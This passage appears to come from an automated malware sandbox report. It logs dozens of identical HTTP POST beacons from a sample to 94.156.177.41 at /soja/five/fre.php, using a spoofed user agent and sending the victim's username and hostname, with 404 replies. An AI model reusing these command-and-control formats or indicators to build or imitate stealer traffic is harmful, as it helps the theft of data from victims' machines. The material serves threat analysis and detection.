                              Jan 11, 2025 08:38:09.430835962 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:38:10.138278961 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:38:10 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              58192.168.2.95003894.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:38:10.292083025 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:38:10.296977997 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:38:11.003601074 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:38:10 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              59192.168.2.95003994.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:38:11.146708965 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:38:11.151743889 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:38:11.883033037 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:38:11 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              60192.168.2.95004094.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:38:12.035147905 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:38:12.040088892 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:38:12.777829885 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:38:12 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              61192.168.2.95004194.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:38:12.944638014 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:38:12.949662924 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:38:13.686588049 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:38:13 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              62192.168.2.95004294.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:38:13.837207079 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:38:13.842179060 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:38:14.556322098 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:38:14 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              63192.168.2.95004394.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:38:14.709022045 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:38:14.714005947 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:38:15.572619915 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:38:15 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              64192.168.2.95004494.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:38:15.722846031 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:38:15.727832079 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:38:16.449412107 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:38:16 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              65192.168.2.95004594.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:38:16.597137928 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:38:16.602138996 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:38:17.326540947 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:38:17 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              66192.168.2.95004694.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:38:17.475481033 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:38:17.480431080 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:38:18.199985981 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:38:18 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              67192.168.2.95004794.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:38:18.357064962 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:38:18.361970901 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:38:19.083893061 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:38:18 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              68192.168.2.95004894.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:38:19.238666058 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:38:19.243599892 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:38:19.942995071 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:38:19 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              69192.168.2.95004994.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:38:20.120965958 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:38:20.125881910 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:38:20.836322069 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:38:20 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              70192.168.2.95005094.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:38:21.370088100 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:38:21.374943972 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:38:22.072261095 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:38:21 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              71192.168.2.95005194.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:38:22.224869967 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:38:22.229790926 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:38:22.938649893 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:38:22 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              72192.168.2.95005294.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:38:23.083657980 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:38:23.088593006 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:38:23.775298119 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:38:23 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              73192.168.2.95005394.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:38:24.215934992 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:38:24.220880032 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:38:24.924638987 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:38:24 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              74192.168.2.95005494.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:38:25.068346977 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:38:25.073323011 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:38:25.792571068 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:38:25 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              75192.168.2.95005594.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:38:25.952918053 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:38:25.957719088 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:38:26.667535067 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:38:26 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              76192.168.2.95005694.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:38:26.967555046 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:38:26.972510099 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:38:27.818962097 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:38:27 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              77192.168.2.95005794.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:38:27.971338987 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:38:27.976207972 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:38:28.682303905 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:38:28 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              78192.168.2.95005894.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:38:28.832487106 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
